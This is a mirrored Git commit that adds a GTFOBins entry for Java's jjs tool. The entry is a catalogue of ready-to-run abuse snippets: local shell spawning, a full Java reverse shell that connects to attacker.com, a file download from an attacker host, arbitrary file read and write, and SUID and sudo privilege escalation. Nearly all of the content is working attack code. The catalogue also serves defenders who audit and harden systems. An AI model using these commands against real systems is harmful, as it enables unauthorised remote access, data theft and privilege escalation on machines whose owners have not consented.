mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-24 13:59:17 +01:00
Add jjs
This commit is contained in:
parent
7ad0233b33
commit
fdda727eb1
50
_gtfobins/jjs.md
Normal file
50
_gtfobins/jjs.md
Normal file
@ -0,0 +1,50 @@
|
||||
---
|
||||
description: This tool is installed starting with Java SE 8.
|
||||
functions:
|
||||
shell:
|
||||
- code: echo "Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -c \$@|sh _ echo sh <$(tty) >$(tty) 2>$(tty)').waitFor()" | jjs
|
||||
reverse-shell:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
echo 'var host=Java.type("java.lang.System").getenv("RHOST");
|
||||
var port=Java.type("java.lang.System").getenv("RPORT");
|
||||
var ProcessBuilder = Java.type("java.lang.ProcessBuilder");
|
||||
var p=new ProcessBuilder("/bin/bash", "-i").redirectErrorStream(true).start();
|
||||
var Socket = Java.type("java.net.Socket");
|
||||
var s=new Socket(host,port);
|
||||
var pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
|
||||
var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){ while(pi.available()>0)so.write(pi.read()); while(pe.available()>0)so.write(pe.read()); while(si.available()>0)po.write(si.read()); so.flush();po.flush(); Java.type("java.lang.Thread").sleep(50); try {p.exitValue();break;}catch (e){}};p.destroy();s.close();' | jjs
|
||||
file-download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export URL=http://attacker.com/file_to_get
|
||||
export LFILE=file_to_save
|
||||
echo "var URL = Java.type('java.net.URL');
|
||||
var ws = new URL('$URL');
|
||||
var Channels = Java.type('java.nio.channels.Channels');
|
||||
var rbc = Channels.newChannel(ws.openStream());
|
||||
var FileOutputStream = Java.type('java.io.FileOutputStream');
|
||||
var fos = new FileOutputStream('$LFILE');
|
||||
fos.getChannel().transferFrom(rbc, 0, Number.MAX_VALUE);
|
||||
fos.close();
|
||||
rbc.close();" | jjs
|
||||
file-write:
|
||||
- code: |
|
||||
echo 'var FileWriter = Java.type("java.io.FileWriter");
|
||||
var fw=new FileWriter("./file_to_write");
|
||||
fw.write("DATA");
|
||||
fw.close();' | jjs
|
||||
file-read:
|
||||
- code: |
|
||||
echo 'var BufferedReader = Java.type("java.io.BufferedReader");
|
||||
var FileReader = Java.type("java.io.FileReader");
|
||||
var br = new BufferedReader(new FileReader("file_to_read"));
|
||||
while ((line = br.readLine()) != null) { print(line); }' | jjs
|
||||
suid:
|
||||
- description: This has been found working in macOS but failing on Linux systems.
|
||||
code: echo "Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -pc \$@|sh\${IFS}-p _ echo sh -p <$(tty) >$(tty) 2>$(tty)').waitFor()" | ./jjs
|
||||
sudo:
|
||||
- code: echo "Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -c \$@|sh _ echo sh <$(tty) >$(tty) 2>$(tty)').waitFor()" | sudo jjs
|
||||
---
|
Loading…
Reference in New Issue
Block a user